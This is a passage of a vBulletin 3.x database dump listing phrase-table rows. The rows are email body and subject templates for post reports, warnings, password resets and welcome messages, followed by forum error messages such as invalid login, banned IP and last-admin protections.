4'), (34154, -1, 'reportpicturecomment_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a picture comment.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nComment: [url]$vboptions[bburl]/$reportinfo[commenturl][/url]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]\r\nOriginal Content: [quote]$reportinfo[pagetext][/quote]', 'vbulletin', 'vBulletin Solutions', 1199982523, '3.7.0 Beta 3'), (34155, -1, 'reportpost', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this post:\r\n\r\n$reportinfo[posttitle]\r\n$vboptions[bburl]/showthread.php?p=$reportinfo[postid]#post$reportinfo[postid]\r\n\r\nThis is part of this thread:\r\n$reportinfo[prefix_plain]$reportinfo[threadtitle]\r\n$vboptions[bburl]/showthread.php?t=$reportinfo[threadid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this forum, or all administrators if there are no moderators.\r\n\r\nPlease respond to this post as applicable.', 'vbulletin', 'vBulletin Solutions', 1196370112, '3.7.0 Beta 1'), (34156, -1, 'reportpost_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a post.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nPost: [url=$vboptions[bburl]/showthread.php?p=$reportinfo[postid]#post$reportinfo[postid]]$reportinfo[prefix_plain]$reportinfo[threadtitle][/url]\r\nForum: $reportinfo[forumtitle]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]\r\nOriginal Content: [quote]$reportinfo[pagetext][/quote]', 'vbulletin', 'vBulletin Solutions', 1196378135, '3.7.0 Beta 1'), (34157, -1, 'reportprivatemessage', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this private message:\r\n\r\nFrom: $reportinfo[pusername]\r\n$reportinfo[pmtitle]\r\n\r\n$reportinfo[message]\r\n\r\n\r\nYou can view the sender\'s profile and optionally apply infractions or bans by following the link below\r\n$vboptions[bburl]/member.php?u=$reportinfo[puserid]\r\n\r\nThis is the reason that the recipient gave for reporting the message:\r\n$reportinfo[reason]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.', 'vbulletin', 'vBulletin Solutions', 1224680828, '3.8.0 Beta 2'), (34158, -1, 'reportprivatemessage_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a private message. \r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nSent by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]\r\nOriginal Content: [quote]$reportinfo[message][/quote]', 'vbulletin', 'vBulletin Solutions', 1220978593, '3.8.0 Alpha 1'), (34159, -1, 'reportvisitormessage', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this visitor message:\r\n\r\n$reportinfo[messagetitle_html]\r\n$vboptions[bburl]/member.php?u=$reportinfo[userid]&tab=visitor_messaging&vmid=$reportinfo[vmid]#vmessage$reportinfo[vmid]\r\n\r\nThis is part of this user\'s profile:\r\n$reportinfo[username]\r\n$vboptions[bburl]/member.php?u=$reportinfo[userid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.\r\n\r\nPlease respond to this post as applicable.', 'vbulletin', 'vBulletin Solutions', 1208774853, '3.7.0 Release Candidate 4'), (34160, -1, 'reportvisitormessage_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a visitor message.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nProfile: [url=$vboptions[bburl]/member.php?u=$reportinfo[userid]&tab=visitor_messaging&vmid=$reportinfo[vmid]#vmessage$reportinfo[vmid]]$reportinfo[username][/url][url=$vboptions[bburl]/member.php?vmid=$reportinfo[vmid]#message$reportinfo[vmid]]$reportinfo[prefix_plain]$reportinfo[messagetitle][/url]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]\r\nOriginal Content: [quote]$reportinfo[pagetext][/quote]', 'vbulletin', 'vBulletin Solutions', 1202158302, '3.7.0 Beta 5'), (34161, -1, 'resetpw', 'emailbody', 'Dear $userinfo[username],\r\n\r\nAs you requested, your password has now been reset. Your new details are as follows:\r\n\r\nUsername: $userinfo[username]\r\nPassword: $newpassword\r\n\r\nTo change your password, please visit this page: $vboptions[bburl]/profile.php?do=editpassword\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34162, -1, 'sendtofriend', 'emailbody', '$sendtoname,\r\n\r\nThis is a message from $bbuserinfo[username] ( mailto:$bbuserinfo[email] ) from the $vboptions[bbtitle] ( $vboptions[bburl]/ ).\r\n\r\nThe message is as follows:\r\n\r\n$emailmessage\r\n\r\n$vboptions[bbtitle] takes no responsibility for messages sent through its system.', 'vbulletin', '', 0, ''), (34163, -1, 'usermessage', 'emailbody', 'This is a message from $bbuserinfo[username] at $vboptions[bbtitle] ( $vboptions[bburl]/$vboptions[forumhome].php ). The $vboptions[bbtitle] owners cannot accept any responsibility for the contents of the email.\r\n\r\nTo email $bbuserinfo[username], you can use this online form:\r\n$vboptions[bburl]/sendmessage.php?do=mailmember&u=$bbuserinfo[userid]\r\n\r\nOR, by email:\r\nmailto:$bbuserinfo[email]\r\n\r\nThis is the message:\r\n\r\n$message', 'vbulletin', '', 0, ''), (34164, -1, 'warning_received_post', 'emailbody', 'Dear $infraction[username],\r\n\r\nYou have received a warning at $vboptions[bbtitle].\r\n\r\nReason:\r\n-------\r\n$infraction[reason]\r\n\r\n$infraction[message]\r\n-------\r\n\r\nOriginal Post:\r\n$infraction[post]\r\n[quote]$postinfo[pagetext][/quote]\r\n\r\nWarnings serve as a reminder to you of the forum\'s rules, which you are expected to understand and follow.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1166744616, '3.6.5'), (34165, -1, 'warning_received_profile', 'emailbody', 'Dear $infraction[username],\r\n\r\nYou have received a warning at $vboptions[bbtitle].\r\n\r\nReason:\r\n-------\r\n$infraction[reason]\r\n\r\n$infraction[message]\r\n-------\r\n\r\nWarnings serve as a reminder to you of the forum\'s rules, which you are expected to understand and follow.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1166744634, '3.6.5'), (34166, -1, 'welcomemail', 'emailbody', 'Dear $username,\r\n\r\nThanks for registering at $vboptions[bbtitle]! We are glad you have chosen to be a part of our community and we hope you enjoy your stay.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34167, -1, 'welcomepm', 'emailbody', 'Thanks for registering at $vboptions[bbtitle]! We are glad you have chosen to be a part of our community and we hope you enjoy your stay.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1146179797, '3.6.0 Beta 1'), (34168, -1, 'accountlocked', 'emailsubject', 'Failed Login Notification on $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1208441770, '3.7.0 Release Candidate 4'), (34169, -1, 'activateaccount', 'emailsubject', 'Action Required to Activate Membership for $vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34170, -1, 'activateaccount_change', 'emailsubject', 'Action Required to Verify Email Change for $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1154111059, '3.6.0'), (34171, -1, 'attachfull', 'emailsubject', 'Forum attachment quota has been reached', 'vbulletin', '', 0, ''), (34172, -1, 'birthday', 'emailsubject', 'Happy Birthday from $vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34173, -1, 'contactus', 'emailsubject', '$vboptions[bbtitle] Contact Us Form - $subject', 'vbulletin', '', 0, ''), (34174, -1, 'digestforum', 'emailsubject', '\"$forum[title_clean]\" update', 'vbulletin', '', 0, ''), (34175, -1, 'digestgroup', 'emailsubject', '\"$group[name]\" update', 'vbulletin', 'vBulletin Solutions', 1234791608, '3.8.2'), (34176, -1, 'digestthread', 'emailsubject', '\"$thread[prefix_plain]$thread[title]\" update', 'vbulletin', 'vBulletin Solutions', 1189591882, '3.6.8'), (34177, -1, 'friendship_request_email', 'emailsubject', 'You have received a Friendship Request at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1198648000, '3.7.0 Beta 4'), (34178, -1, 'infraction_post_infraction', 'emailsubject', 'Infraction Reversed', 'vbulletin', 'vBulletin Solutions', 1149280395, '3.6.0 Beta 1'), (34179, -1, 'infraction_post_warning', 'emailsubject', 'Warning Reversed', 'vbulletin', 'vBulletin Solutions', 1149280385, '3.6.0 Beta 1'), (34180, -1, 'infraction_received', 'emailsubject', 'You have received an infraction at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34181, -1, 'infraction_thread_infraction', 'emailsubject', 'Infraction for $infractioninfo[username]: $infractioninfo[title]', 'vbulletin', 'vBulletin Solutions', 1150319686, '3.6.0 Beta 3'), (34182, -1, 'infraction_thread_warning', 'emailsubject', 'Warning for $infractioninfo[username]: $infractioninfo[title]', 'vbulletin', 'vBulletin Solutions', 1150319697, '3.6.0 Beta 3'), (34183, -1, 'lostpw', 'emailsubject', 'Your login details for $vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34184, -1, 'moderation_deleted', 'emailsubject', 'Account removed at $vboptions[bbtitle]!', 'vbulletin', '', 0, ''), (34185, -1, 'moderation_validated', 'emailsubject', 'Account validated at $vboptions[bbtitle]!', 'vbulletin', '', 0, ''), (34186, -1, 'moderator', 'emailsubject', 'New Post/Thread Notification: $foruminfo[title_clean]', 'vbulletin', '', 0, ''), (34187, -1, 'newevent', 'emailsubject', 'New Event Notification: $calendarinfo[title]', 'vbulletin', '', 0, ''), (34188, -1, 'newuser', 'emailsubject', 'New User at $vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34189, -1, 'notify', 'emailsubject', 'Reply to thread \'$threadinfo[prefix_plain]$threadinfo[title]\'', 'vbulletin', 'vBulletin Solutions', 1189592520, '3.6.8'), (34190, -1, 'notify_discussion', 'emailsubject', 'Reply to social group discussion \'$discussion[title]\'', 'vbulletin', 'vBulletin Solutions', 1213799556, '3.7.1'), (34191, -1, 'paidsubscription_reminder', 'emailsubject', 'Paid Subscription Expiry Notice', 'vbulletin', '', 0, ''), (34192, -1, 'parentcoppa_profile', 'emailsubject', '$username\'s account at $vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34193, -1, 'parentcoppa_register', 'emailsubject', '$username\'s account at $vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34194, -1, 'payment_received', 'emailsubject', 'Paid Subscription Received at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1147376234, '3.6.0 Beta 1'), (34195, -1, 'payment_reversed', 'emailsubject', 'Paid Subscription Reversed at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1147376224, '3.6.0 Beta 1'), (34196, -1, 'pmboxalmostfull', 'emailsubject', 'Inbox almost full at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1146508071, '3.6.0 Beta 1'), (34197, -1, 'pmboxfull', 'emailsubject', 'Inbox full at $vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34198, -1, 'pmreceived', 'emailsubject', 'New Private Message at $vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34199, -1, 'reminder', 'emailsubject', 'Upcoming events at $vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34200, -1, 'reportalbumpicture', 'emailsubject', 'Reported Album Picture from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1196369533, '3.7.0 Beta 1'), (34201, -1, 'reportalbumpicture_newthread', 'emailsubject', 'Reported Album Picture by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1196369564, '3.7.0 Beta 1'), (34202, -1, 'reportgroupmessage', 'emailsubject', 'Reported Social Group Message from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1196369626, '3.7.0 Beta 1'), (34203, -1, 'reportgroupmessage_newthread', 'emailsubject', 'Reported Social Group Message by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1196369635, '3.7.0 Beta 1'), (34204, -1, 'reportgrouppicture', 'emailsubject', 'Reported Group Picture from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1196369650, '3.7.0 Beta 1'), (34205, -1, 'reportgrouppicture_newthread', 'emailsubject', 'Reported Group Picture by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1196369661, '3.7.0 Beta 1'), (34206, -1, 'reportitem_newpost', 'emailsubject', 'Reported Item', 'vbulletin', 'vBulletin Solutions', 1196369371, '3.7.0 Beta 1'), (34207, -1, 'reportpicturecomment', 'emailsubject', 'Reported Picture Comment from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1199981077, '3.7.0 Beta 3'), (34208, -1, 'reportpicturecomment_newthread', 'emailsubject', 'Reported Picture Comment by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1199981090, '3.7.0 Beta 3'), (34209, -1, 'reportpost', 'emailsubject', 'Reported Post from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1196369610, '3.7.0 Beta 1'), (34210, -1, 'reportpost_newthread', 'emailsubject', 'Reported Post by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1196369427, '3.7.0 Beta 1'), (34211, -1, 'reportprivatemessage', 'emailsubject', 'Reported PM from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1224680971, '3.8.0 Beta 2'), (34212, -1, 'reportprivatemessage_newthread', 'emailsubject', 'Reported Private Message by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1220978522, '3.8.0 Alpha 1'), (34213, -1, 'reportvisitormessage', 'emailsubject', 'Reported Visitor Message from $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1197373083, '3.7.0 Beta 1'), (34214, -1, 'reportvisitormessage_newthread', 'emailsubject', 'Reported Visitor Message by $reportinfo[rusername]', 'vbulletin', 'vBulletin Solutions', 1197373090, '3.7.0 Beta 1'), (34215, -1, 'resetpw', 'emailsubject', 'Your new password for $vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34216, -1, 'warning_received', 'emailsubject', 'You have received a warning at $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34217, -1, 'welcomemail', 'emailsubject', 'Welcome to $vboptions[bbtitle]!', 'vbulletin', '', 0, ''), (34218, -1, 'welcomepm', 'emailsubject', 'Welcome to $vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1145904570, '3.6.0 Beta 1'), (34219, -1, 'activate_deleterequest', 'error', 'You are going to delete the activation request.
\r\nThis will effectively suspend your account and you will not receive further emails.
\r\n
\r\nIf you instead want to activate your account, please click here.
\r\n
\r\nDelete the activation request', 'vbulletin', 'vBulletin Solutions', 1163415387, '3.6.4'), (34220, -1, 'activate_moderation', 'error', 'Your account has been activated but you are currently in the moderation queue to be added to the forum.', 'vbulletin', '', 0, ''), (34221, -1, 'activate_requestdeleted', 'error', 'The activation request has been deleted. You will not receive further emails.', 'vbulletin', '', 0, ''), (34222, -1, 'activate_wrongusergroup', 'error', 'Your account has already been activated so please try logging in.', 'vbulletin', '', 0, ''), (34223, -1, 'additional_products_disable_x_y', 'error', 'The following products depend on {1} and must also be disabled:\r\n
    {2}
\r\nTo continue disabling all these products, click here.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34224, -1, 'additional_products_enable_x_y', 'error', 'The following products are required by {1} and must also be enabled:\r\n
    {2}
\r\nTo continue enabling all these products, click here.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34225, -1, 'admin_disabled_php_info', 'error', 'Sorry, the administrator has disabled PHP Info display.', 'vbulletin', '', 0, ''), (34226, -1, 'adsense_not_deployed_upgrade_error', 'error', 'Your Google AdSense account is no longer associated with your vBulletin customer account. To redeploy Google AdSense, please associate a Google AdSense account in the vBulletin Members Area.', 'vbulletin', 'vBulletin Solutions', 1229643293, '3.8.0 Beta 4'), (34227, -1, 'after_upgrade_360rc1', 'error', 'As of vBulletin 3.6.0 RC1\r\n
    \r\n
  • The Allow Signatures option has been removed. If you had this option disabled, you should use signature permissions to deny signatures for specific usergroups.
  • \r\n
  • Apple™ has updated the iTunes podcast categories. We have followed suit and updated the categories within vBulletin. You will need to edit any podcasting forums and update to the proper category
  • \r\n
', 'vbulletin', 'vBulletin Solutions', 1152214461, '3.6.0 Release Candidate 1'), (34228, -1, 'after_upgrade_36_update_counters', 'error', 'After upgrading to vBulletin 3.6, you must rebuild thread information and then forum information on this page.
\r\n
\r\nClick \"Address\" to rebuild thread information now. Once this has completed, you should still rebuild forum information!', 'vbulletin', 'vBulletin Solutions', 1150127028, '3.6.0 Beta 2'), (34229, -1, 'after_upgrade_37_image_verification_disabled', 'error', 'vBulletin 3.7 removes the \"Simple Type\" option for GD-based image verification as it was not reliable at stopping bots. An alternative method for image verification is available, but your server does not appear to be compatible with this method.
\r\n
\r\nHuman verification is currently disabled. If you wish to verify that visitors are human, please select an alternative verification method by clicking \"Address\".', 'vbulletin', 'vBulletin Solutions', 1210088263, '3.7.1'), (34230, -1, 'after_upgrade_37_moderator_permissions', 'error', 'vBulletin 3.7 adds additional moderator permissions. Values for these new permissions were determined based on existing permissions. Please review these permissions to ensure that they are correct.', 'vbulletin', 'vBulletin Solutions', 1209462374, '3.7.0'), (34231, -1, 'after_upgrade_37_modified_css', 'error', 'You have one or more styles with custom CSS in the first (upper) Additional CSS Definitions field. You should move these custom declarations to the second (lower) field. Modified text will appear in RED and needs to be reverted after moving the custom CSS to the second field.

\r\n\r\nFailure to do this will most likely result in the HTML of your forum not being presented properly.', 'vbulletin', 'vBulletin Solutions', 1201305954, '3.7.0 Beta 5'), (34232, -1, 'after_upgrade_37_update_counters', 'error', 'After upgrading to vBulletin 3.7, you must rebuild thread information and then forum information on this page.
\r\n
\r\nClick \"Address\" to rebuild thread information now. Once this has completed, you should still rebuild forum information!', 'vbulletin', 'vBulletin Solutions', 1193148391, '3.7.0 Beta 1'), (34233, -1, 'after_upgrade_password_check', 'error', 'In this version, users may no longer set their password to be the same as their username. Such passwords make accounts vulnerable to exploitation from automated scripts and programs that can guess the password to access your board under the guise of the affected users. This may be done for the purposes of spam or online identity theft.
\r\n
\r\nUsers with these password will be prompted to change them on their next login. However, you may wish to explicitly reset these users\' passwords. Click \"Address\" to see the password reset options.', 'vbulletin', 'vBulletin Solutions', 1219837764, '3.8.0 Alpha 1'), (34234, -1, 'album_title_no_empty', 'error', 'The album title cannot be empty.', 'vbulletin', 'vBulletin Solutions', 1192543194, '3.7.0 Beta 1'), (34235, -1, 'all_avatars_added', 'error', 'There are no further avatars to insert from this directory', 'vbulletin', '', 0, ''), (34236, -1, 'all_phrases_are_up_to_date', 'error', 'All phrases are up-to-date.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34237, -1, 'all_post_icons_added', 'error', 'There are no further post icons to insert from this directory', 'vbulletin', '', 0, ''), (34238, -1, 'all_smilies_added', 'error', 'There are no further smilies to insert from this directory', 'vbulletin', '', 0, ''), (34239, -1, 'all_templates_are_up_to_date', 'error', 'All templates are up-to-date.', 'vbulletin', 'vBulletin Solutions', 1210604189, '3.7.1'), (34240, -1, 'already_member_of_group', 'error', 'You are already a member of this Group', 'vbulletin', 'vBulletin Solutions', 1196174076, '3.7.0 Beta 1'), (34241, -1, 'alreadyregistered', 'error', 'Our records show that you have already registered under the name of {1}. If you have lost your password, click here. If you would like to modify your profile, click here.', 'vbulletin', '', 0, ''), (34242, -1, 'attachdel', 'error', 'You did not select any attachments to delete.', 'vbulletin', '', 0, ''), (34243, -1, 'attachments_moved_to_the_database', 'error', 'Attachments Successfully Moved to the Database', 'vbulletin', '', 0, ''), (34244, -1, 'attachments_moved_to_the_filesystem', 'error', 'Attachments Successfully Moved to the Filesystem\r\n
\r\n
\r\nYou should now Optimize your attachment table to reclaim space that was used by the attachments that are no longer there.', 'vbulletin', '', 0, ''), (34245, -1, 'attachments_not_moved_to_the_filesystem', 'error', 'You have chosen to not finalize the attachment move to the filesystem. Your attachments are still in the database, from which they will be read from. You probably have left orphans files and directories in the path you specified to receive the attachments. You will need to manually clear these files if you wish to free up that space.', 'vbulletin', '', 0, ''), (34246, -1, 'attachpathfailed', 'error', 'Could not create file system directory to hold your attachment.', 'vbulletin', '', 0, ''), (34247, -1, 'avatardisabled', 'error', 'The administrator has disabled the use of avatars.', 'vbulletin', '', 0, ''), (34248, -1, 'avatarmoreposts', 'error', 'You do not have enough posts to use this avatar. Please select another.', 'vbulletin', '', 0, ''), (34249, -1, 'avatarpath_not_writable', 'error', 'The avatar thumbnail directory at /images/avatars/thumbs is not writable. Please contact your host for assistance. Thumbnails cannot be created until this issue is resolved.', 'vbulletin', 'vBulletin Solutions', 1194032793, '3.7.0 Beta 1'), (34250, -1, 'backup_filename_must_end_with_sql', 'error', 'Backup filename must end with the .sql extension', 'vbulletin', '', 0, ''), (34251, -1, 'bademail', 'error', 'You entered an invalid email address.', 'vbulletin', '', 0, ''), (34252, -1, 'badlogin', 'error', 'You have entered an invalid username or password. Please press the back button, enter the correct details and try again. Don\'t forget that the password is case sensitive. Forgotten your password? Click here!', 'vbulletin', 'vBulletin Solutions', 1156779929, '3.6.1'), (34253, -1, 'badlogin_strikes', 'error', 'You have entered an invalid username or password. Please press the back button, enter the correct details and try again. Don\'t forget that the password is case sensitive. Forgotten your password? Click here!

\r\nYou have used {3} out of 5 login attempts. After all 5 have been used, you will be unable to login for 15 minutes.', 'vbulletin', 'vBulletin Solutions', 1156779906, '3.6.1'), (34254, -1, 'badmsn', 'error', 'You entered an invalid MSN handle.', 'vbulletin', '', 0, ''), (34255, -1, 'badpassword', 'error', 'The password you have entered does not match your current one. Please press the back button, enter the correct details and try again. Don\'t forget that the password is case sensitive. Forgotten your password? Click here!', 'vbulletin', '', 0, ''), (34256, -1, 'badskype', 'error', 'You entered an invalid Skype name.', 'vbulletin', '', 0, ''), (34257, -1, 'ban_reason_updated', 'error', 'The ban reason has been updated.', 'vbulletin', 'vBulletin Solutions', 1201013062, '3.7.0 Beta 5'), (34258, -1, 'banemail', 'error', 'The administrator has banned your email address. You will need to change your email address in order to continue. If you think this is done in error, please click here to contact the administrator.', 'vbulletin', 'vBulletin Solutions', 1248366412, '3.8.3'), (34259, -1, 'banip', 'error', 'Sorry. The administrator has banned your IP address. To contact the administrator click here', 'vbulletin', '', 0, ''), (34260, -1, 'begin_date_after_end_date', 'error', 'The begin date cannot fall after the end date.', 'vbulletin', '', 0, ''), (34261, -1, 'birthdayfield', 'error', 'You have entered an invalid birthday.', 'vbulletin', '', 0, ''), (34262, -1, 'bitfield_conflicts_x', 'error', 'A conflict was detected in the bitfields. You cannot continue with the installation of this product until this has been fixed. The conflicts found were:\r\n
    \r\n{1}\r\n
', 'vbulletin', 'vBulletin Solutions', 1158145033, '3.6.1'), (34263, -1, 'bookmark_site_deleted_successfully', 'error', 'Social bookmarking site deleted successfully', 'vbulletin', 'vBulletin Solutions', 1190989059, '3.7.0 Beta 1'), (34264, -1, 'bookmark_site_saved_successfully', 'error', 'Social bookmarking site saved successfully', 'vbulletin', 'vBulletin Solutions', 1190989072, '3.7.0 Beta 1'), (34265, -1, 'calendarbaddate', 'error', 'You entered an invalid date.', 'vbulletin', '', 0, ''), (34266, -1, 'calendarbadtime', 'error', 'Incorrect time chosen. Make sure that a valid from time and to time is set. Make sure to either choose a pre-defined time or set your own.', 'vbulletin', '', 0, ''), (34267, -1, 'calendareventexists', 'error', 'This event appears to already exist. You probably pressed submit more than once.', 'vbulletin', '', 0, ''), (34268, -1, 'calendarmove', 'error', 'There are no calendars to move this event to.', 'vbulletin', '', 0, ''), (34269, -1, 'calendarnorecur', 'error', 'No recurring event will occur for the date range you specified.', 'vbulletin', '', 0, ''), (34270, -1, 'calendartodate', 'error', 'The TO date cannot fall before the FROM date.', 'vbulletin', '', 0, ''), (34271, -1, 'can_not_duplicate_options', 'error', 'You can not have duplicate options with this field type.', 'vbulletin', 'vBulletin Solutions', 1199987993, '3.7.0 Beta 4'), (34272, -1, 'cannot_delete_last_social_group_category', 'error', 'You cannot delete the last social group category.', 'vbulletin', 'vBulletin Solutions', 1216903539, '3.8.0 Alpha 1'), (34273, -1, 'cannot_leave_group_if_owner', 'error', 'You cannot leave a group you own. You must delete the group.', 'vbulletin', 'vBulletin Solutions', 1193762699, '3.7.0 Beta 1'), (34274, -1, 'cant_add_usergroup_leader', 'error', 'You can\'t add a usergroup leader to the specified user group', 'vbulletin', '', 0, ''), (34275, -1, 'cant_converse_with_self', 'error', 'Sorry, but you can\'t converse with yourself here.', 'vbulletin', 'vBulletin Solutions', 1201068252, '3.7.0 Beta 5'), (34276, -1, 'cant_de_admin_last_admin', 'error', 'You are trying to remove control panel access for the last administrative user.
\r\n
\r\nThis would lock you out of the control panel, so you cannot proceed', 'vbulletin', '', 0, ''), (34277, -1, 'cant_delete_default_language', 'error', 'You may not delete or disable user access to the language you have set as the default language for your forum. If you want to delete or disable user access to this language, please set another language to be the default language first.', 'vbulletin', '', 0, ''), (34278, -1, 'cant_delete_default_style', 'error', 'The default style set within the vBulletin Options cannot be deleted. Please change this before attempting to delete the style.', 'vbulletin', '', 0, ''), (34279, -1, 'cant_delete_last_admin', 'error', 'You are trying to delete the last administrative user.

This would lock you out of the control panel, so you cannot proceed', 'vbulletin', '', 0, ''), (34280, -1, 'cant_delete_last_admin_group', 'error', 'You are about to remove the last group with control panel access. This would lock you out of the control panel - you cannot proceed', 'vbulletin', '', 0, ''), (34281, -1, 'cant_delete_last_language', 'error', 'You cannot delete the last language installed on your forum', 'vbulletin', '', 0, ''), (34282, -1, 'cant_delete_last_style', 'error', 'You are about to remove the last style that visitors are allowed to use. That would be bad - you cannot proceed', 'vbulletin', '', 0, ''), (34283, -1, 'cant_delete_master_phrase', 'error', 'This phrase belongs to the Master Language. You may not delete it.', 'vbulletin', '', 0, ''), (34284, -1, 'cant_delete_usergroup', 'error', 'You are not authorized to delete this Usergroup', 'vbulletin', '', 0, ''), (34285, -1, 'cant_overwrite_non_existent_language', 'error', 'Sorry, you can\'t overwrite a language that does not exist', 'vbulletin', '', 0, ''), (34286, -1, 'cant_overwrite_non_existent_style', 'error', 'Sorry, you can\'t overwrite a style that does not exist', 'vbulletin', '', 0, ''), (34287, -1, 'cant_parent_faq_item_to_child', 'error', 'You can\'t parent a FAQ item to one of its own children', 'vbulletin', '', 0, ''), (34288, -1, 'cant_parent_faq_item_to_self', 'error', 'You can\'t parent a FAQ item to itself', 'vbulletin', '', 0, ''), (34289, -1, 'cant_parent_forum_to_child', 'error', 'You can\'t parent a forum to one of its own children', 'vbulletin', '', 0, ''), (34290, -1, 'cant_parent_forum_to_self', 'error', 'You can\'t parent a forum to itself', 'vbulletin', '', 0, ''), (34291, -1, 'cant_parent_style_to_self', 'error', 'You can\'t parent a style to itself', 'vbulletin', '', 0, ''), (34292, -1, 'cant_parent_x_to_child', 'error', 'You can\'t parent a {1} to one of its own children', 'vbulletin', '', 0, ''), (34293, -1, 'cant_remove_last_avatar_category', 'error', 'You cannot delete the last avatar category', 'vbulletin', '', 0, ''), (34294, -1, 'cant_remove_last_post_icon_category', 'error', 'You cannot delete the last post icon category', 'vbulletin', '', 0, ''), (34295, -1, 'cant_remove_last_smilie_category', 'error', 'You cannot delete the last smilie category', 'vbulletin', '', 0, ''), (34296, -1, 'cant_set_cookies', 'error', 'Unable to add cookies, header already sent.
\r\nFile: {1}
\r\nLine: {2}
', 'vbulletin', '', 0, ''), (34297, -1, 'cantlistself_ignore', 'error', 'We can\'t help you ignore yourself.', 'vbulletin', 'vBulletin Solutions', 1154552245, '3.6.0'), (34298, -1, 'cantlistself_ignorelist', 'error', 'Sorry, no matter how much you try, you cannot ignore yourself.', 'vbulletin', 'vBulletin Solutions', 1151617795, '3.6.0 Beta 4'), (34299, -1, 'cantreportself', 'error', 'You are not allowed to turn yourself in.', 'vbulletin', '', 0, ''), (34300, -1, 'cantsplitall', 'error', 'You can\'t split all of the posts in a thread. What would the point of that be?', 'vbulletin', '', 0, ''), (34301, -1, 'censoredword', 'error', 'You have used a censored word. Please remove this word.', 'vbulletin', 'vBulletin Solutions', 1171450618, '3.6.5'), (34302, -1, 'censorfield', 'error', 'One of the fields that you have entered for your profile contains words that have been added to the list of disallowed words by the administrator. Please correct any words that you think might be on the list. If the problem persists, please contact the administrator.', 'vbulletin', '', 0, ''), (34303, -1, 'checkboxsize', 'error', 'You may only select {1} option(s) for the {2} field.', 'vbulletin', '', 0, ''), (34304, -1, 'completed_database_backup_successfully', 'error', 'Completed Database Backup Successfully', 'vbulletin', '', 0, ''), (34305, -1, 'completed_search_successfully', 'error', 'Completed Search Successfully', 'vbulletin', '', 0, ''), (34306, -1, 'completed_x_successfully', 'error', 'Completed {1} Successfully', 'vbulletin', 